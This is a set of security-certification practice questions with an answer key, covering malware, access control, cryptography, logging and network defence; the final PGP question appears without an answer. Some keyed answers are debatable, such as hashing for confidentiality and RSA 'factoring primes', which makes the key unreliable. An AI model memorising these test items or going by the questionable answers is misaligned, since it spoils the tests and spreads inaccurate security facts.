O'Reilly Practice Tests


Which of the following equations represents the complexity of a password policy that enforces a lowercase password using the letters a through z, where "n" is the password length?

26 ^ n

What should be incorporated with annual awareness security training?
Signing of a user agreement
Implementation of security controls
User rights and permissions review
Succession planning

A

Which of the following defines the difference between a Trojan horse and a worm? (Select the best answer.)
A. Worms self-replicate but Trojan horses do not.
B. The two are the same.
C. Worms are sent via e-mail; Trojan horses are not.
D. Trojan horses are malicious attacks; worms are not.

A

Which of the following invalidates SQL injection attacks that were launched from a lookup field of a web server?
Input validation
Security template
NIDS
Buffer overflow protection

A

Which protocol is based on SSH?
SFTP
TFTP
FTP
FTPS

A

You are designing security for an application. You need to ensure that all tasks relating to the transfer of money require actions by more than one user through a series of checks and balances. What access control method should you use?
Separation of duties
Implicit deny
Job rotation
Least privilege

A

You have been alerted to suspicious traffic without a specific signature. Under further investigation, you determine that the alert was a false indicator. Furthermore, the same alert has arrived at your workstation several times. Which security device needs to be configured to disable false alarms in the future? (Select the best answer.)
A. Anomaly-based IDS
B. Signature-based IPS
C. Signature-based IDS
D. UTM
E. SIEM

A

You suspect a broadcast storm on the LAN. Which tool is required to diagnose which network adapter is causing the storm?
A. Protocol analyzer
B. Firewall
C. Port scanner
D. Network intrusion detection system
E. Port mirror

A

Which of the following best describes a backdoor?
Code inserted into software that initiates one of several types of functions when specific criteria are met
Computer programs used to bypass normal authentication or other security mechanisms in place
Code that restricts access to a computer and makes demands for money
A group of compromised computers

B

Which of the following methods will identify which services are running on a computer?
Calculate risk
Determine open ports
Review baseline reporting
Review firewall logs

B

What is the best way to prevent ARP poisoning across a network?
MAC flooding
Log analysis
Loop protection
VLAN segregation

D. By segregating a network into multiple virtual LANs, ARP poisoning attacks hopefully will falter when trying to cross from one VLAN to the next. This isn't always successful, but it is one smart way to try to avoid ARP poisoning attacks.

Your organization has implemented cloud computing. Which of the following security controls do you no longer possess?
Logical control of data
Physical control of data
Administrative control of data
Executive control of data

B

A recent security audit has uncovered an increase in the number of MITM attacks during the certificate validation process. Which of the following is a way to add security to the certificate validation process to help detect and block many types of MITM attacks by adding an extra step beyond normal X.509 certificate validation?
OID stapling
SSH
S/MIME
Certificate pinning

D

Tim needs to collect data from users who utilize an Internet-based application. Which of the following should he reference before doing so?
Secure code review
SOX
Acceptable use policy
Privacy policy

D

What is a definition of implicit deny?
Everything is denied by default.
All traffic from one network to another is denied.
ACLs are used to secure the firewall.
Resources that are not given access are denied by default.

D

What is the best reason for security researchers to use virtual machines?
To offer a secure virtual environment where they can conduct online deployments
To offer an environment where they can discuss security research
To offer an environment where network applications can be tested
To offer an environment where malware might be executed but with minimal risk to equipment

D

Which of the following OSI model layers is where SSL provides encryption?
Network
Application
Transport
Session

D

Which of the following provides a user with a rolling password for one-time use?
PIV card
CAC card
Multifactor authentication
RSA tokens

D

You are in charge of installing patches to servers. Which of the following processes should you follow before installing a patch?
Due process
Separation of duties
Fault tolerance
Change management

D

You are the security administrator for the company ABC Accounting, Inc. The IT director has given rights to you that allow you to review logs and update network devices only. Other rights are given out to network administrators for the areas that fall within their job description. What kind of access control is this?
Job rotation
Discretionary
Mandatory vacation
Least privilege

D

You surmise that a user's session was interrupted by an attacker who inserted malicious code into the network traffic. What attack has occurred?
DoS
Spoofing
Phishing
Man-in-the-middle

D

HIDS and NIDS are similar intrusion detection systems. However, one is for individual computers, and the other is for networks. Which of the following would a HIDS be installed to monitor?
System files
CPU performance
Network adapter performance
Temporary Internet files

A. A HIDS, or host-based intrusion detection system, is software installed on an individual computer to monitor important files and watch for intrusions. System files are some of the most important files that will be monitored by a HIDS. Temporary Internet files are not nearly as important and are usually removed automatically by way of a policy in many organizations. See the section titled "Implementing Security Applications" in Chapter 3, "Computer Systems Security Part II," for more information. Incorrect answers: CPU and network adapter performance are usually monitored by some type of performance monitoring program; these are often built into the operating system.

What kind of attack would a flood guard protect a network from?
SYN attack
Xmas attack
MITM attack
Botnet

A. A SYN attack (also known as a SYN flood) is when a large number of synchronization request packets are sent from a client to a server. To protect against this, SYN flood guards can be implemented within some firewalls or as separate devices altogether. If implemented on a firewall, some configuration is usually necessary. See the section titled "Malicious Attacks" in Chapter 7, "Networking Protocols and Threats," for more information. Incorrect answers: An Xmas attack (Christmas tree packet attack) is used to analyze TCP/IP responses. It might have many of the option bits in the header enabled, but it does not have the SYN flag set. MITM stands for man-in-the-middle, an attack that intercepts and modifies data traveling between a client and a server. A botnet is a group of compromised computers that jointly (and unknowingly) attacks single points of interest such as web servers.

What is the purpose of a chain of custody as it is applied to forensic image retention?
To provide documentation as to who handled the evidence
To provide a baseline reference
To provide proof the evidence hasn't been tampered with
To provide data integrity

A. A chain of custody is the chronological documentation of evidence. A procedure is involved when creating the chain of custody that logically defines how the documentation will be entered. See the section titled "Legislative and Organizational Policies" in Chapter 18, "Policies and Procedures," for more information. Incorrect answers: Baseline references and baseline reporting deal with checking the security posture of a system, as in a security posture assessment. To prove that the image hasn't been tampered with (to prove its integrity), a security professional will hash the image.

Which of the following would you most likely find in a buffer overflow attack?
NOP instructions
Sequence numbers
IV length
Set flags

A. A large number of No Operation instructions (known as NOP or no-op instructions) can be used to overflow a buffer, which could allow unwanted code to be executed or result in a denial of service (DoS). Large numbers of NOP instructions can be used to perform a NOP slide (or NO-OP sled). See the section titled "Secure Programming" in Chapter 5, "Application Security," for more information. Incorrect answers: Sequence numbers are how TCP packets are numbered. IV length has to do with the length of a string in a cipher. Flags are one or more bits that are set to a binary number to indicate whether something is on or off.

When creating a public/private key pair, for which of the following would an admin need to specify the key strength?
RSA
AES
DES
SHA

A. RSA is the only cipher listed that deals with private and public keys; it is an asymmetric algorithm. When creating a certificate, the admin needs to specify the underlying algorithm (most likely RSA) and its key strength (most likely 2048-bit or higher). See the section "Encryption Algorithms" in Chapter 14, "Encryption and Hashing Concepts," for more information. Incorrect answers: AES and DES are symmetric algorithms—the admin does not select the key strength. SHA is a cryptographic hash function, and again, the admin does not select the key strength. These protocols (and their respective versions) are predetermined in their key length.

Jason is a security administrator for a company of 4000 users. He wants to store 6 months of security logs to a logging server for analysis. The reports are required by upper management due to legal obligations but are not time-critical. When planning for the requirements of the logging server, which of the following should not be implemented?
A. Performance baseline and audit trails
B. Time stamping and integrity of the logs
C. Log details and level of verbose logging
D. Log storage and backup requirements

A. A performance baseline and audit trails are not necessarily needed. Security logs are usually not performance-oriented. For example, you might get this list from a Windows Server's Security log in the Event Viewer. Auditing this much information could be unfeasible for one person. However, it is important to implement time stamping of the logs and store log details. Before implementing the logging server, Jason should check whether he has enough storage and backup space to meet his requirements.

Your organization has several building keys circulating among various executive and human resources employees. You are concerned that the keys could be easily lost, stolen, or duplicated, so you have decided to implement an additional security control based on facial recognition. Which of the following will address this goal?
Security guard
Fingerprint scanner
Mantraps
Proximity readers

A. A security guard will be able to recognize the faces of the employees in the organization. Usually, the guard will consult a physical access list on paper or on the computer to identify the employee. The guard might view the employee directly, through privacy glass, or via CCTV. Facial recognition can also be accomplished through advanced biometric systems, but these can be very costly to an organization.

Which of these is a true statement concerning active interception?
A. When a computer is put between a sender and receiver
B. When a person overhears a conversation
C. When a person looks through files
D. When a person hardens an operating system

A. Active interception normally includes a computer placed between the sender and the receiver to capture information. All other statements concerning active interception are false. If a person overhears a conversation, it can be considered eavesdropping. When a person looks through files, it could be normal or malicious. When a person hardens an operating system, that person is making it more secure. We discuss these concepts as we progress through the book.

You have collected login information, file access information, security log files, and unauthorized security violations. What is this collection known as?
Audit trail
Audit
Access control list
Security log

A. An audit trail is a collection of security log files, unauthorized security violations, and other logged information such as successful or failed logins. See the section "Conducting Audits" in Chapter 13, "Monitoring and Auditing," for more information. Incorrect answers: The audit is the technical assessment made of applications, files, and networks; quite often this includes an audit trail. An access control list (ACL) is a set of rules or permissions. The security log is the log file in Windows (found in the Event Viewer) that shows security violations or allowed access whether they succeeded or not; it works when auditing has been turned on.

Which of the following is the most complicated centralized key management scheme?
Asymmetric
Symmetric
Whole disk encryption
Steganography

A. Asymmetric systems such as PKI (public-key infrastructure) have a complicated centralized key management scheme.

Which of the following security actions should be completed before a user is given access to the network?
Identification and authentication
Authentication and authorization
Identification and authorization
Authentication and biometrics

A. Before users are given access to a network, they need to identify themselves in one or more ways and be authenticated via whatever system is in place. After they are given access to the network, they can later be authorized to individual resources. The authentication step cannot be skipped.

Which of the following protocols or services uses port 19?
CHARGEN
Echo
Telnet
SMTP

A. CHARGEN, the character generator, uses port 19. It is commonly used by a Fraggle attack. See the section titled "Ports and Protocols" in Chapter 7, "Networking Protocols and Threats," for more information. Incorrect answers: Echo uses port 7. Telnet uses port 23. SMTP uses port 25.

Which one of the following is the most common encryption protocol used for key exchange during a secure web session?
RSA
AES
SHA
PKI

A. The RSA encryption protocol is an asymmetric algorithm used for the key exchange during secure web sessions. Other options for key exchange include Diffie-Hellman and elliptic curve, with or without ephemeral properties.

You are surprised to notice that a co-worker's computer is communicating with an unknown IRC server and is scanning other systems on the network. None of this was scheduled by anyone in your organization, and the user appears to be unaware of what is transpiring. What is the most likely cause?
The computer is part of a botnet.
The computer is infected with a worm.
The computer is infected with spyware.
The computer is infected with a rootkit.

A. If the computer in question is scanning the network and accessing an unknown IRC server without the user's knowledge, then the computer has probably been compromised as a zombie and is now part of a botnet. The IRC server probably acts as a central communication point for all zombies in the botnet. See the section titled "Delivery of Malware" in Chapter 2, "Computer Systems Security Part I," for more information. Incorrect answers: Though the computer had to be infected with some kind of payload originally, that malware is not responsible for the events that are transpiring currently.

NTLM is for the most part backward compatible and is an improved version of which of the following?
LANMAN
AES
MD5
passwd

A. LANMAN is an outdated hash used in Windows; it is the original hash used to store passwords. The NTLM (and the newer NTLMv2) hash is used in newer versions of Windows to replace LANMAN.

Rick is reviewing the logs of a host-based IDS. They show that the computer has been compromised by a botnet and is communicating with a master server. If Rick needs to power the computer off, which of the following types of data will be unavailable?
Memory, system processes, and network processes
Memory, archival storage, and temporary files
Swap files, system processes, and the master boot record
The system disk, e-mail, and log files

A. Memory is cleared when the computer is shut down (unless hibernation mode has been implemented). This removes system and network processes from memory. See the section titled "Implementing Security Applications" in Chapter 3, "Computer Systems Security Part II," for more information. Incorrect answers: Archival storage, the master boot record, system disk, e-mail, and log files will still be available. Although two other answers had possibilities within them, they weren't altogether correct.

Your organization hires temporary users to assist with end-of-year resources and calculations. All the temporary users need access to the same domain resources. These "temps" are hired for a specific period of time with a set completion date. Users log on to a Windows domain controlled by a Windows Server domain controller. Your job is to make sure that the accounts can be used only during the specific period of time for which the temps are hired. The solution you select should require minimal administrative effort and upkeep. Of the following, what is the best solution?
Configure expiration dates for the temp user accounts
Configure password expiration dates for temp user accounts
Configure a domain password policy for the temp user accounts
Configure a local password policy on the computers used by temp user accounts
Delete the temp user accounts at the end of the work period

A. One easy solution is to configure expiration dates for the temp user accounts. This can be done within the Account tab of each user's Properties window. This way, the users cannot log on to the domain after their work period has ended. See the section "Rights, Permissions, and Policies" in Chapter 11, "Access Control Methods and Models," for more information. Incorrect answers: You cannot configure password expiration dates for the user accounts within the user's Properties window; however, you can configure a policy with a password expiration date, but you have to make additional configurations for this to work properly. By default, the users would simply be asked to change their password when the password expiration date arrives. Password policies can be configured in the same manner (password expiration dates and so on), but they have the same problems as well. Deleting user accounts is usually not a good idea; organizations will generally disable accounts so that they can audit any actions the user accounts have taken in the past. Deleting a user account will make auditing difficult.

Which of the following requires a CA during the authentication process?
PEAP-TLS
FTPS explicit
FTPS implicit
MD5

A. PEAP (Protected Extensible Authentication Protocol) creates a TLS (Transport Layer Security) tunnel by acquiring a PKI certificate from a CA. It is known simply as PEAP or as PEAP-TLS. It is similar to EAP-TTLS. See the section titled "Authentication Models and Components" in Chapter 10, "Physical Security and Authentication Models," for more information. Incorrect answers: FTPS is FTP over SSL. Explicit mode means that the FTPS client must explicitly request security from the FTPS server. Implicit FTPS connections do not allow negotiation—there is no request for security; it is expected from the server. MD5 is a cryptographic hash function.

You have established a baseline for your server. Which of the following is the best tool to use to monitor any changes to that baseline?
A. Performance Monitor
B. Anti-spyware
C. Antivirus software
D. Vulnerability assessments software

A. Performance monitoring software can be used to create a baseline and monitor for any changes to that baseline. An example of this would be the Performance console window within Windows Server. (It is commonly referred to as Performance Monitor.) Antivirus and anti-spyware applications usually go hand-in-hand and are not used to monitor server baselines. Vulnerability assessing software such as Nessus or Nmap is used to see whether open ports and other vulnerabilities are on a server.

You need to control access to a network through a Cisco router. Which of the following authentication services should you use?
TACACS+
SSH
Telnet
SNMP

A. TACACS+ is commonly used to control access to networks through Cisco routers.

Your organization has a policy that states that user passwords must be at least 16 characters. Your computers use NTLM2 authentication for clients. Which of the following hash algorithms will be used for password authentication?
MD5
AES
LM hash
SHA

A. The MD5 hashing algorithm is used by NTLM2 authentication. MD5 stands for Message-Digest algorithm 5. It uses a 128-bit key and is a widely used hashing algorithm. LM hash is used with passwords of 14 or fewer characters. If you use a password of 15 characters or more on newer versions of Windows, the OS will store a constant string as the LM hash, which is effectively a null password, and thereby uncrackable. The real password will be stored as an NTLM2 hash (in this case calculated with MD5) and will be used solely. See the section titled "Hashing Basics" in Chapter 14, "Encryption and Hashing Concepts," for more information. Incorrect answers: AES is the Advanced Encryption Standard, used widely in wireless networks. SHA is the Secure Hash Algorithm; SHA-1 employs a 160-bit hash and is deprecated. Newer versions of SHA are more secure than MD5.

Which of the following log files identifies when a computer was last shut down?
System
Security
Application
Directory Services

A. The System log file shows when a computer was started or shut down. See the section "Conducting Audits" in Chapter 13, "Monitoring and Auditing," for more information. Incorrect answers: The Security log file shows audit entries. The Application log file shows changes, warnings, or errors to applications built into Windows and third-party applications. The Directory Services log file shows events, warnings, and errors that occur on a domain controller.

You have been tasked with providing a staff of 250 employees secure remote access to your corporate network. Which of the following is the best solution?
VPN concentrator
Web security gateway
Web proxy
Software-based firewall

A. The VPN concentrator is the best solution listed. A hardware device such as this can handle 250 concurrent, secure, remote connections to the network. See the section titled "Authentication Models and Components" in Chapter 10, "Physical Security and Authentication Models," for more information. Incorrect answers: Web security gateways are used to block access to specific websites. Web proxies cache website content for later use. Software-based firewalls can allow for remote secure access but not for the number of concurrent connections needed. A hardware-based firewall or VPN concentrator is the best solution.

Which of the following is the best practice to secure log files?
Copy the log files to a server in a remote location.
Log all failed and successful login attempts.
Increase the size of the log files.
Perform hashing of the log files.

A. The best practice for securing log files is to make sure they are copied to a remote location, better yet to another server in a remote location, where they can be easily accessed if the original server fails. This remote location should be in another city, not across the street in another building.

A user receives an encrypted message that was encrypted using asymmetric cryptography. What does this recipient need to decrypt the message?
Recipient's private key
Recipient's public key
Sender's private key
Sender's public key

A. The recipient's private key is necessary to decrypt the message. The recipient's private key is part of a key pair that also includes the public key that was used to encrypt the message.

Which of the following ports is required by an e-commerce web server running SSL?
Port 443 inbound
Port 80 inbound
Port 80 outbound
Port 443 outbound

A. The web server needs to have inbound port 443 open to accept secure requests for SSL sessions from clients. See the section titled "Security Protocols" in Chapter 15, "PKI and Encryption Protocols," for more information. Incorrect answers: The outbound port doesn't actually matter; it's the inbound port that is important for the server. Inbound port 80 is used by default for regular HTTP connections.

Your boss needs you to implement a password policy that prevents a user from reusing the same password. To be effective, the policy must be implemented in conjunction with the password history policy. Which of the following is the best method?
Minimum age
Expiration time
Password length
Lockout time

A. This question refers to Windows Server products. The minimum age password policy setting must be set to enforce an effective password history policy. If this is not done (in conjunction with the password history policy), then the user will be able to reuse old passwords. For example, if the minimum age was set to the default of zero, then the user could simply change his password as many times as needed, without waiting, to get past the password history policy, and ultimately reuse an old password. The minimum age must always be less than the maximum age setting and must be more than zero to enforce a password history policy properly.

Why would you use a vulnerability scanner?
To identify open ports on a computer
To identify remote access policies
To crack passwords
To see whether passwords are sent as clear text

A. Vulnerability scanners are primarily used to find open ports on a computer and define what threats are associated with those ports. See the section titled "Assessing Vulnerability with Security Tools" in Chapter 12, "Vulnerability and Risk Assessment," for more information. Incorrect answers: Remote access policies should be identified within the server where the policy was created (for example, in Windows Server). Password recovery programs such as John the Ripper should be used to crack passwords. To see whether passwords are being sent as clear text, you should use a protocol analyzer.

You have been given the task of scanning for viruses on a PC. What is the best of the following methods?
A. Recovery environment
B. Dual-boot into Linux
C. Command Prompt only
D. Boot into Windows normally

A. You should use a recovery environment. Most often, this would be the one built into Windows. Many manufacturers suggest using this, and more specifically Safe Mode. However, it could also be a Linux rescue disc or flash drive. That's not a true dual-boot though. An actual dual-boot is when Windows and Linux are both installed to the hard drive. Command Prompt only is not enough, nor is it necessary for some virus scanning scenarios. Booting into Windows normally is tantamount to doing nothing. Remember to use a recovery environment when scanning for viruses.

Mitigating risk based on cost could be described as which of the following?
Business impact analysis
Quantitative risk assessment
Vulnerability assessment
Qualitative risk assessment

B

Why do hackers often target nonessential services? (Select two answers.)
Quite often, they are not configured correctly.
They are not monitored as often.
They are not used.
They are not monitored by an IDS.

AB. Nonessential services are often not configured and secured by the network administrator; this goes hand in hand with the fact that they are not monitored as often as essential services. It is imperative that network administrators scan for nonessential services and close any corresponding ports. See the section "Assessing Vulnerability with Security Tools" in Chapter 12, "Vulnerability and Risk Assessment," for more information. Incorrect answers: Even though services may be nonessential, that doesn't necessarily mean that they are not used. An IDS, if installed properly, should monitor everything on a given system.

Which of the following requires a baseline? (Select the two best answers.)
A. Behavior-based monitoring
B. Performance Monitor
C. Anomaly-based monitoring
D. Signature-based monitoring

AC.

Which of the following protocols does the 802.11i standard support? (Select two.)
AES
RSA
TKIP
ECC
DES

AC. AES (Advanced Encryption Standard) and TKIP (Temporal Key Integrity Protocol) are supported by the 802.11i standard, which deals with wireless transmissions. See the section "Encryption Algorithms" in Chapter 14, "Encryption and Hashing Concepts," for more information. Incorrect answers: RSA deals with the encrypting of data through the use of tokens. ECC (elliptic curve cryptography) and DES are also used to encrypt data.

Which of the following would be considered detrimental effects of a virus hoax? (Select the two best answers.)
A. Technical support resources are consumed by increased user calls.
B. Users are at risk for identity theft.
C. Users are tricked into changing the system configuration.
D. The e-mail server capacity is consumed by message traffic.

AC. Because a virus can affect many users, technical support resources can be consumed by an increase in user phone calls. This can be detrimental to the company because all companies have a limited number of technical support personnel. Another detrimental effect is that unwitting users may be tricked into changing some of their computer system configurations. The key term in the question is "virus hoax." The technical support team might also be inundated by support e-mails from users, but not to the point where the e-mail server capacity is consumed. If the e-mail server is consumed by message traffic, that would be a detrimental effect caused by the person who sent the virus and by the virus itself but not necessarily by the hoax. Although users may be at risk for identity theft, it is not one of the most detrimental effects of the virus hoax.

Mark works for a financial company. He has been tasked to protect customer data. He decides to install a mantrap and an HVAC system in the data center. Which of the following concepts has he addressed? (Select two.)
Availability
Integrity
Confidentiality
Recovery
Accountability

AC. The HVAC system addresses the need for availability of data. Without a proper HVAC system, a data center's servers (and other equipment) would probably overheat, resulting in a loss of service. The mantrap addresses the need for confidentiality. Customer data in financial organizations, health insurance companies, and many other organizations requires privacy and confidentiality. By installing a mantrap, unauthorized persons will be detained and won't be able to access customer data.

Which of the following security technologies should you provide to allow users remote access to your network? (Select two.)
Firewall
Subnetting
NAT
VPN
NAC

AD. A firewall can be used in conjunction with a virtual private network (VPN) service to allow users remote access to your network. The firewall might incorporate the VPN, or the VPN might be controlled by a separate server or concentrator. See the section titled "Authentication Models and Components" in Chapter 10, "Physical Security and Authentication Models," for more information. Incorrect answers: Subnetting is not necessary for remote access, but it is a security method used to compartmentalize networks. Network address translation (NAT) is used to translate LAN addresses through to the Internet. Network access control (NAC) is used to authenticate computers and users in a secure fashion on the LAN.

Which of the following encryption algorithms are supported by the IEEE 802.11i standard? (Select two.)
TKIP
RSA
ECC
AES

AD. The IEEE 802.11i standard amends the original 802.11 standard and was later incorporated into the IEEE 802.11-2007 standard. It specifies security mechanisms for wireless networks, including TKIP and AES. It also deprecates WEP. TKIP, the Temporal Key Integrity Protocol, is used as a solution to replace WEP without requiring any replacement of older hardware. Although it is a better solution than WEP, TKIP was deprecated in 2009 by the IEEE—CCMP is recommended in its place. (CCMP stands for Counter Mode Cipher Block Chaining Message Authentication Code Protocol.) AES, the Advanced Encryption Standard, is the superior type of encryption to use in wireless networks. It works with WPA and WPA2 but might require hardware upgrades. See the section titled "Encryption Algorithms" in Chapter 14, "Encryption and Hashing Concepts," for more information. Incorrect answers: RSA (Rivest, Shamir, Adleman) is a public-key cryptography algorithm commonly used on the Internet and considered to be unbreakable if used properly. ECC, which stands for elliptic curve cryptography, is another type of public-key cryptography, but this is based on the structure of an elliptic curve and mathematical problems.

Which of the following would an antivirus program most likely not detect? Select 2 answers. Logic bomb Worm Virus Trojan Pharming

AE. Antivirus programs are meant to scan for viruses, worms, and Trojans. They are least likely to discover logic bombs because logic bombs don't manifest themselves right away.

Your boss wants you to properly log what happens on a database server. What are the most important concepts to think about while you do so? (Select the two best answers.) A. The amount of virtual memory that you will allocate for this task B. The amount of disk space you will require C. The information that will be needed to reconstruct events later D. Group Policy information

B and C. It is important to calculate how much disk space you will require for the logs of your database server and verify that you have that much disk space available on the hard drive. It is also important to plan what information will be needed in the case that you need to reconstruct events later. Group Policy information and virtual memory are not important for this particular task.

Of the following, which two security measures should be implemented when logging a server? (Select the two best answers.) A. Cyclic redundancy checks B. The application of retention policies on log files C. Hashing of log files D. Storing of temporary files

B and C. The log files should be retained in some manner either on this computer or on another computer. By hashing the log files, the integrity of the files can be checked even after they are moved. Cyclic redundancy checks, or CRCs, have to deal with the transmission of Ethernet frames over the network. Temporary files are normally not necessary when dealing with log files.

Which of the following is a record of the tracked actions of users? A. Performance Monitor B. Audit trails C. Permissions D. System and event logs

B.

Which of the following algorithms depends on the inability to factor large prime numbers? AES RSA Elliptic curve Diffie-Hellman

B.

Jane is a systems administrator and must revoke the access of a user who has been terminated. Which policy must she implement? Password recovery Password expiration Account disablement Account lockout

C

The server room is on fire. What should the HVAC system do? Increase the humidity. Increase the heat. Turn off. Turn on the AC.

C

Which of the following authentication protocols makes use of a supplicant, authenticator, and authentication server? Kerberos 802.1X RADIUS LDAP

B. 802.1X makes use of three components: a supplicant, which is software running on a workstation; an authenticator, which is a wireless access point or switch; and an authentication server, which is an authentication database, most likely a RADIUS server. See the section "Authentication Models and Components" in Chapter 10, "Physical Security and Authentication Models," for more information. Incorrect answers: Kerberos makes use of a key distribution center that works with tickets to prove the identity of users. RADIUS provides centralized administration of dial-up, VPN, and wireless authentication and can be used with 802.1X and EAP (Extensible Authentication Protocol). LDAP (Lightweight Directory Access Protocol) can access and modify directory services data.

What are the minimum requirements for a cold site? Location near the data center that meets power requirements Location that meets power and connectivity requirements Location with all required equipment loaded with all updates Location with duplicate systems

B. A cold site only requires power and connectivity.

You have been contracted to determine if network activity spikes are related to an attempt by an attacker to breach the network. The customer wants you to identify when the activity occurs and what type of traffic causes the activity. Which type of tool should you use? Network mapper Protocol analyzer System Monitor Performance Monitor

B. A protocol analyzer will capture packets and timestamp each one. This tells you exactly what type of packets were captured and when. If the timestamps correspond to the network activity spikes, you know you have a match for the time. By digging into the packets with a protocol analyzer, you can find out exactly what type of traffic is causing the activity.

Which of the following encryption protocols is the strongest and can encrypt data with the least amount of CPU usage? DES AES 3DES RC4

B. AES, the Advanced Encryption Standard, is currently considered to be the strongest symmetric encryption protocol. It can also encrypt data with the least amount of CPU usage compared to the rest of the listed answers. This makes it a great choice for wireless networks, whole disk encryption, and so on. See the section titled "Encryption Algorithms" in Chapter 14, "Encryption and Hashing Concepts," for more information. Incorrect answers: DES and its successor 3DES were the predecessors to AES. Both of them are considered deprecated, weaker encryption protocols and require more CPU usage than AES. RC4 is a symmetric stream cipher used with SSL and WEP. It is known for its speed, but when used with WEP, it can be cracked easily.

Dan is a network administrator. One day he notices that his DHCP server is flooded with information. He analyzes it and finds that the information is coming from more than 50 computers on the network. Which of the following is the most likely reason? A. Virus B. Worm C. Zombie D. PHP script

B. A worm is most likely the reason that the server is being bombarded with information by the clients; perhaps it is perpetuated by a botnet. Because worms self-replicate, the damage can quickly become critical.

After auditing an FTP server, you note that the server has an average of 100 concurrent connections. Where should you look to determine whether this is normal or whether your FTP server is being attacked? Secure code review Baseline reporting Security policy DRP

B. Baseline reporting will tell you what has happened in the past on your FTP server. By creating a baseline, you can compare current results with past results, helping you to determine whether the activity is normal.

A critical system in the server room was never connected to a UPS. The security administrator for your organization has initiated an authorized service interruption of the server to fix the problem. Which of the following best describes this scenario? Succession planning Fault tolerance Continuity of operations Disaster recovery

B. Because the security administrator is deliberately interrupting service in a proactive effort to fix the problem, this scenario would be best described as fault tolerance. Also, the fact that a UPS is being installed to make the system tolerant of power loss lends to the fault tolerance answer. See the section titled "Redundancy Planning" in Chapter 16, "Redundancy and Disaster Recovery," for more information. Incorrect answers: If the administrator was planning how to implement a new server, then it would be succession planning. Continuity of operations and disaster recovery deal with the scenario of an actual disaster and the planning for recovery from that disaster.

Your boss's smartphone is encrypted and has screen lock protection, yet data was still stolen from it. How is this possible? Botnet Bluesnarfing SIM cloning GPS tracking

B. Bluesnarfing is an attack that can steal data such as phonebook contacts, calendar information, and so on, regardless of the phone's encryption and screen lock. To protect against this, set the smartphone to undiscoverable and use a hard-to-guess Bluetooth pairing key.

Which of the following is not a record of the tracked actions of users? Previous logon notification Audit trails Application log Security log

C

Which of the following is most likely to result in data loss? Accounting personnel transferring confidential staff information with SFTP Developers copying data from production to test environments with USB sticks Encrypted backup tapes left unattended at reception for offsite storage Back office staff updating details on a mainframe with SSH

B. By default, if data is copied to a USB stick, it is not encrypted. There is virtually no security in this scenario, and the worst part is that the USB sticks are physically traveling from one department to another. To rectify the situation, the developers could consider using AES-256 to encrypt the data on the USB flash drives. See the section titled "Securing Computer Hardware and Peripherals" in Chapter 3, "Computer Systems Security Part II," for more information. Incorrect answers: The accounting personnel are using SFTP, the backup tapes are encrypted, and the back office staff is using SSH. All these other scenarios at least have some kind of security in mind.

An employee has been terminated from your organization. What can ensure that the organization continues to have access to the employee's private keys? Store the keys in a CRL Store the keys in escrow Delete the employee's user account Retain the employee's token

B. By storing the keys in escrow, the organization can continue to have access to them, even after the employee has been terminated. See the section "Public Key Infrastructure" in Chapter 15, "PKI and Encryption Protocols," for more information. Incorrect answers: A CRL is a certificate revocation list, which stores certificates that have been revoked; for many different reasons, these certificates are no longer in circulation. Usually organizations will have a policy stating that employees' user accounts should not be deleted. By not deleting the user account, it will continue to be linked to the user's private keys and to any logged auditing information associated with the employee. Generally, when an employee is terminated, the hardware token and user's account will be disabled. A hardware token deals with a different technology than private keys being stored in escrow. The proper place to access the employee's private keys is within escrow within a PKI.

Whitelisting, blacklisting, and closing open relays are all mitigation techniques addressing what kind of threat? A. Spyware B. Spam C. Viruses D. Botnets

B. Closing open relays, whitelisting, and blacklisting are all mitigation techniques that address spam. Spam e-mail is a serious problem for all companies and must be filtered as much as possible.

Which of the following web application security weaknesses can be mitigated by preventing the usage of HTML tags? SQL injection Cross-site scripting LDAP injection Rootkits

B. Cross-site scripting (XSS) is an attack on website applications that injects client-side script into web pages. See the section titled "Secure Programming" in Chapter 5, "Application Security," for more information. Incorrect answers: SQL injection is a type of code injection that exploits vulnerabilities in databases. LDAP injection can be used to modify LDAP statements and modify the LDAP tree. Rootkits are software designed to gain administrator-level access over a computer system.

You have been given ten hard drives that need to be decommissioned. What is the first thing you should do? Format the hard drive. Perform a bit-level erasure or overwrite the drive. Contact a waste disposal facility. Burn the hard drives in an incinerator.

B. Hard drives should be sanitized. This can be done with bit-level erasure software that completely obliterates any data that was previously on the drive. See the section titled "Legislative and Organizational Policies" in Chapter 18, "Policies and Procedures," for more information. Incorrect answers: Formatting the drive is not sufficient because data can still be recovered from a formatted drive. Even if you plan to dispose of the drives with a third-party facility, the drive should still be sanitized beforehand. Most organizations will not burn hard drives. It might even be illegal in your municipality. Instead, after sanitization, hard drives are often pulverized.

You have been asked by your boss to protect the confidentiality of sensitive data entered into a database table. What is the best method to use? Encryption Hashing Secure Copy Biometrics

B. Hashing is used in databases for indexing and file retrieval and is used to protect the confidentiality of data in database tables. It is faster and easier to use than encryption methods. See the section titled "Hashing Basics" in Chapter 14, "Encryption and Hashing Concepts," for more information. Incorrect answers: Encryption is commonly used to protect the confidentiality of data files but is perhaps not the best option for information that is integral to database tables. Secure Copy (SCP) is used to securely transfer files between two computers. Biometrics is the science of identifying humans from their physical characteristics.

You have been tasked with providing daily network usage reports of layer 3 devices without compromising any data during the information gathering process. Which of the following protocols should you select to provide for secure reporting in this scenario? A. ICMP B. SNMP C. SNMPv3 D. SSH

C

Jennifer has been tasked with configuring multiple computers on the WLAN to use RDP on the same wireless router. Which of the following might be necessary to implement? Enable a DMZ for each wireless computer. Forward each computer to a different RDP port. Turn off port forwarding for each computer. Turn on AP isolation on the wireless router.

B. If there are multiple computers allowing incoming Remote Desktop Protocol (RDP) sessions on the WLAN, you might have to configure the wireless router to forward each computer to a different RDP port. For example, the standard RDP port is 3389 (also known as Terminal Services). If that is open on the router, then clients on the Internet will be able to initiate RDP sessions to your network. But usually, the port on the router can only be forwarded to one computer. It might be necessary to set up additional port numbers and have each one map to a separate computer on the WLAN. Of course, the users on the Internet would need to know the special port number that corresponds to the computer they want to connect to. Often this will be used for remote access by the employee who would otherwise be working at the computer in the office.

Which of the following is a disadvantage of PGP? Weak encryption can be easily broken A recipient must trust a public key that is received. Private keys can be compromised. Man-in-the-middle attacks are common.

